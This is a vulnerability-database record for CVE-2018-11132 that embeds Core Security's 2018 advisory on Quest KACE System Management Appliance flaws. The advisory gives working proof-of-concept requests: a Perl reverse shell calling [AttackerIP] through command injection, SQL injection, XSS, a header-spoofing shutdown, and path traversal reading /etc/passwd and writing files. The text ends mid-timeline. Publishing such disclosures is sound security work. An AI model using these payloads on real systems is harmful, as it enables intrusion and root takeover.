CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity amp; access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0592",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10906"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"db": "NVD",
"id": "CVE-2018-11132"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11132"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11132",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-11132",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-10906",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-11132",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11132",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-10906",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1222",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-11132",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10906"
},
{
"db": "VULMON",
"id": "CVE-2018-11132"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"db": "NVD",
"id": "CVE-2018-11132"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "In order to perform actions that require higher privileges, the Quest KACE System Management Appliance 8.0.318 relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed. A command injection vulnerability exists within this message queue which allows low-privilege users to append arbitrary commands that will be run as root. Quest KACE System Management Appliance Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nQuest KACE System Management Appliance Multiple Vulnerabilities\n\n1. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. *Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. *Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. \n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. \n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. Quest KACE System Management Appliance 8.0 (Build 8.0.318)\nOther products and versions might be affected too, but they were not tested. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. \n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. *Unauthenticated command injection*\n\n[CVE-2018-11138]\nThe \u0027/common/download_agent_installer.php\u0027 script is accessible to anonymous\nusers in order to download an agent for a specific platform. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. \n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. *Authenticated command injection*\n\n[CVE-2018-11139]\nThe \u0027/common/ajax_email_connection_test.php\u0027 script used to test the\nconfigured\nSMTP server is accessible by any authenticated user and can be abused to\nexecute arbitrary commands on the system. This script is vulnerable to\ncommand injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the\nscript via POST method. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *PHP Object Injection leading to arbitrary command execution*\n\n[CVE-2018-11135]\nAn authenticated user could abuse a deserialization call on the script\n\u0027/adminui/error_details.php\u0027 to inject arbitrary PHP objects. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). \n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. \n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. *Unauthenticated SQL Injection in download_agent_installer.php*\n\n[CVE-2018-11136]\nThe \u0027orgID\u0027 parameter received by the \u0027/common/download_agent_installer.php\u0027\nscript is not sanitized, leading to SQL injection. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. *SQL Injection in run_report.php*\n\n[CVE-2018-11140]\nThe \u0027reportID\u0027 parameter received by the \u0027/common/run_report.php\u0027 script\nis not sanitized, leading to SQL injection. In particular, an error based\ntype. \n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. *Path traversal in download_attachment.php leading to arbitrary\nfile read*\n\n[CVE-2018-11137]\nThe \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script can\nbe abused to read arbitrary files with \u0027www\u0027 privileges. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. \n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. *Path traversal in advisory.php leading to arbitrary file\ncreation/deletion*\n\n[CVE-2018-11141]\nThe \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the\n\u0027/adminui/advisory.php\u0027 script can be abused to write and delete files\nrespectively. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nhannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). \n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe 